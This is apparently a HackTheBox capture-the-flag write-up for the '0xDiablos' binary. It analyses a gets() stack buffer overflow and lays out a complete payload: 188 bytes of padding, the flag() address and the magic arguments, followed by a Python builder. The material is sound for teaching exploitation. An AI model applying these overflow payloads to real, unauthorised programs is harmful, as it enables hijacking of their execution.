Tags: pwn, free, easy, 0xDiablos, hackthebox

Task: Exploit a gets() stack buffer overflow in a 32-bit binary to call a flag-printing function with the correct parameters. Solution: Write 188 bytes of padding to reach the saved return address (EIP), overwrite it with the address of flag(), and place the magic values 0xdeadbeef and 0xc0ded00d on the stack as cdecl arguments after a fake return address.

Techniques: stack buffer overflow, return address overwrite, ret2func with args

0xDiablos — HackTheBox

Description

A classic binary exploitation challenge where you are given a 32-bit ELF binary called "vuln" and a remote target to exploit. The binary has a buffer overflow vulnerability that must be exploited to call a hidden flag-printing function with the correct magic parameters.

Binary Analysis

File: ELF 32-bit, dynamically linked, not stripped

Security:

  • No PIE (base 0x8048000 — fixed addresses)
  • No stack canary
  • NX disabled (executable stack)
  • Partial RELRO
  • RWX segments present

Key functions (via objdump):

  • vuln() at 0x08049272 — contains gets() call (buffer overflow)
  • flag() at 0x080491e2 — reads and prints flag.txt, but requires correct parameters

Vulnerability

  1. vuln() allocates a buffer at ebp - 0xb8 (184 bytes)
  2. Calls gets() on this buffer — unbounded read, classic stack buffer overflow
  3. No stack canary to prevent overwrite

flag(param1, param2) function logic:

  1. Opens "flag.txt" with fopen()
  2. Reads contents with fgets() (64 bytes)
  3. Checks if param1 == 0xdeadbeef AND param2 == 0xc0ded00d
  4. Only if BOTH checks pass, calls printf() to print the flag
  5. If either check fails, returns silently without printing

Buffer overflow math:

  • Buffer size: 184 bytes (ebp - 0xb8)
  • Saved EBP: 4 bytes
  • Offset to EIP (return address): 184 + 4 = 188 bytes

Exploitation Strategy

  1. Overflow the buffer in vuln() to overwrite the saved return address (EIP)
  2. Redirect execution to flag() function
  3. Since this is a 32-bit binary using cdecl calling convention, function arguments are passed on the stack after the return address
  4. Place the two magic values (0xdeadbeef, 0xc0ded00d) at the correct stack positions

Payload layout (32-bit cdecl):

[188 bytes padding] [flag() addr] [fake return] [param1] [param2]
     'A' * 188      0x080491e2      'BBBB'     0xdeadbeef 0xc0ded00d
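To make the frame math concrete, here is an added Python snippet (not part of the original writeup) that packs the layout above into bytes using the addresses and magic values the writeup lists, then decodes the result to check that each field lands at the offset the table predicts:

```python
import struct

# Values taken from the writeup (32-bit ELF, no PIE, so addresses are fixed).
BUF_SIZE = 0xb8            # vuln()'s buffer sits at ebp - 0xb8 (184 bytes)
SAVED_EBP = 4              # saved frame pointer lies just above the buffer
FLAG_ADDR = 0x080491e2     # flag()
MAGIC1 = 0xdeadbeef        # param1 expected by flag()
MAGIC2 = 0xc0ded00d        # param2 expected by flag()


def p32(value: int) -> bytes:
    """Pack a 32-bit value little-endian, the i386 word order."""
    return struct.pack("<I", value)


def eip_offset(buf_size: int = BUF_SIZE, saved_ebp: int = SAVED_EBP) -> int:
    """Bytes from the start of the buffer to the saved return address."""
    return buf_size + saved_ebp  # 184 + 4 = 188


def build_payload(flag_addr: int = FLAG_ADDR, fake_ret: bytes = b"BBBB") -> bytes:
    """Lay out the frame exactly as the writeup's table describes it.

    Under cdecl the callee sees [return address][arg1][arg2] above its
    frame, so after the overwritten EIP comes a fake return address and
    only then the two magic values.
    """
    return (
        b"A" * eip_offset()  # padding: buffer + saved EBP
        + p32(flag_addr)     # overwritten EIP -> flag()
        + fake_ret           # what flag() would return to (unused here)
        + p32(MAGIC1)        # param1
        + p32(MAGIC2)        # param2
    )


def describe(payload: bytes) -> dict:
    """Decode the payload back into its fields to sanity-check the offsets."""
    off = eip_offset()
    return {
        "padding": off,
        "eip": struct.unpack("<I", payload[off:off + 4])[0],
        "fake_ret": payload[off + 4:off + 8],
        "param1": struct.unpack("<I", payload[off + 8:off + 12])[0],
        "param2": struct.unpack("<I", payload[off + 12:off + 16])[0],
    }
```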

...
